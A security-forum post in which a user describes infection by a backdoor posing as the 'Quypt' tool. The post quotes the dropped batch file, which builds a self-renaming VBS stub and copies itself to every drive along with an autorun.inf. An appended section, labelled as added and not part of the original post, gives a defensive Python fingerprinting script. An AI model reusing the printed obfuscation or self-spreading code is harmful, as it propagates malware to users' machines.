Government Security
Network Security Resources



Quypt / Undeadnet

windows tools firewall backdoor

#1 AgentSmith15




Posted 26 April 2011 - 01:14 AM

Ugh, I don't normally get caught running stupid stuff, but I was researching Quypt and supposedly it comes on the Backtrack liveCD. So I did a Google search and was led to a forum (I linked below) where they gave a link to download it. Not knowing what it was, I ran it and immediately noticed something off, especially when I couldn't open Task Manager.

Anyways, it looks like a backdoor, and it left an obfuscated batch file in a temp directory. It does a whole bunch of policy changes: changing folder permissions, adding a user in the background, opening the firewall, shutting down Windows Defender and a whole bunch of AV. I haven't had time to look at the executables, but I am curious after seeing the batch file. Also, a few AVs report this as a tool which grabs your SteamID.

The site's name in question is hxxp://

Also, I am kinda stumped on this little snippet of the batch file it left behind. Don't run.
ECHO randomize>>ovfsbeksodog.vbs
ECHO set gpkqtmrducqqqa=createobject("scripting.filesystemobject")>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,1)>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=mpmnebrcflqhmsflapjfkq.readall>>ovfsbeksodog.vbs
ECHO qdclllivmghlvehi="ksgphdvileffsjsu knfggeiqihufrjbfanaresgjhslgeovovfsbeksodogosedme vfolkghiqdnbjg ighkrktvitdm vddghactakajbtrl apaupfutdkopvlicbhtg pgsdkllfenlp ingnldakomrotskginhh eleavvtealtjkbvdjsquduepkucqmkoo rggcrjmlfdfdoippie semipvdqepmddjocscdj tokdknsmuuablhplam mbfpubkutohgaptqhtfchd oobpnukbunmtkgakhfjefh opqtmokeiqihufrjbfanaresgjhgoq dmolkjatnrpjbbfbkckqvk rnledlakfnsapd hjfameqfcedr uekaeearsascab ahnjksmkvlvusultjkbvdjsquduepk vcradmmovjbokonvemph ppidlbhjjekoglet  nchvsrinjocpropdtmak tluqaclqmuukdgrecd nrniurtairbe frucopeltdpstkfvjdcoll ulmkistquadtsm rtofbomvsmmbnlevofmk qaoqvugtrbhqfptbsk bjemmbacgfqf ilmojrstthqpap qeurmtfgcehboismofpp qiltjkbvdjsquduepkaqcbnmid eiqihufrjbfanaresgjh qdclllivmghlvehi aslennthoeej ltjkbvdjsquduepk ckietoflidgbbg rhduriekhocshmqb gpkqtmrducqqqa mpmnebrcflqhmsflapjfkq ovfsbeksodog":aslennthoeej=split(qdclllivmghlvehi," ")>>ovfsbeksodog.vbs
ECHO for each ltjkbvdjsquduepk in aslennthoeej>>ovfsbeksodog.vbs
ECHO for ckietoflidgbbg=1 to int(rnd*6)+6>>ovfsbeksodog.vbs
ECHO rhduriekhocshmqb=rhduriekhocshmqb+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=replace(eiqihufrjbfanaresgjh,ltjkbvdjsquduepk,rhduriekhocshmqb):rhduriekhocshmqb="">>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,2,1)>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.writeline eiqihufrjbfanaresgjh>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.close>>ovfsbeksodog.vbs
start ovfsbeksodog.vbs

for p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist p:%0 goto Non
for i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > i:
ECHO [autorun] > i:\autorun.inf
Any ideas? Did I miss a set command somewhere? The batch is included in the zip file.

I was gonna write some C++, but then I got high
I was gonna skip all that .NET stuff, but then I got high,
Now I'm stuck with non-deterministic finalization, and I know why.
Because I got high, because I got high, because I got high.
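
Added analysis example (not part of the original post and not the sample's own code): the VBS stub that the batch writes out reads the batch file itself (%0), replaces each word in the space-separated list with fresh random letters, and writes the file back, so the identifiers change on every run. For triage, the Python below reverses that by mapping each listed name to a stable placeholder so two generations compare and hash the same; extract_tokens, normalize, fingerprint, make_sample and both samples are constructed for illustration.

```python
import hashlib
import re

# name="tok tok ...":other=split(name," ")  -- the rename list inside the stub
LIST_RE = re.compile(r'(\w+)="([a-z ]+)":\w+=split\(\1," "\)', re.I)
MIN_LEN = 8  # assumption: skip short tokens so real keywords are never clobbered

def extract_tokens(text):
    """Return the unique identifiers named in the stub's rename list, in order."""
    m = LIST_RE.search(text)
    if not m:
        return []
    tokens = []
    for tok in m.group(2).split(" "):  # a double space yields "", dropped here
        if len(tok) >= MIN_LEN and tok not in tokens:
            tokens.append(tok)
    return tokens

def normalize(text):
    """Replace every listed identifier with ID01, ID02, ... (by list position)."""
    tokens = extract_tokens(text)
    mapping = {tok: f"ID{n:02d}" for n, tok in enumerate(tokens, 1)}
    # Longest first: some list entries contain other entries as substrings.
    for tok in sorted(tokens, key=len, reverse=True):
        text = text.replace(tok, mapping[tok])
    return text, mapping

def fingerprint(text):
    """SHA-256 of the normalized text; stable across renamed generations."""
    return hashlib.sha256(normalize(text)[0].encode()).hexdigest()

def make_sample(fso, stub, lst, arr):
    """Constructed three-line sample shaped like the stub (not the real file)."""
    return (
        f'ECHO set {fso}=createobject("scripting.filesystemobject")>>{stub}.vbs\n'
        f'ECHO {lst}="{fso} {stub}  {lst} {arr}":{arr}=split({lst}," ")>>{stub}.vbs\n'
        f'start {stub}.vbs\n'
    )

# Two constructed "generations" that differ only in their random identifiers.
GEN_A = make_sample("qwertyuiopas", "zxcvbnmlkjhg", "plokmijnuhby", "tgbrfvedcwsx")
GEN_B = make_sample("mnbvcxzasdfg", "hjklpoiuytre", "wqazxswedcvf", "rtgbnhyujmki")

if __name__ == "__main__":
    print(normalize(GEN_A)[0])
    print(fingerprint(GEN_A) == fingerprint(GEN_B))
```

Feed it the text of a dropped copy read from disk as data; it only rewrites strings and never executes the sample.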
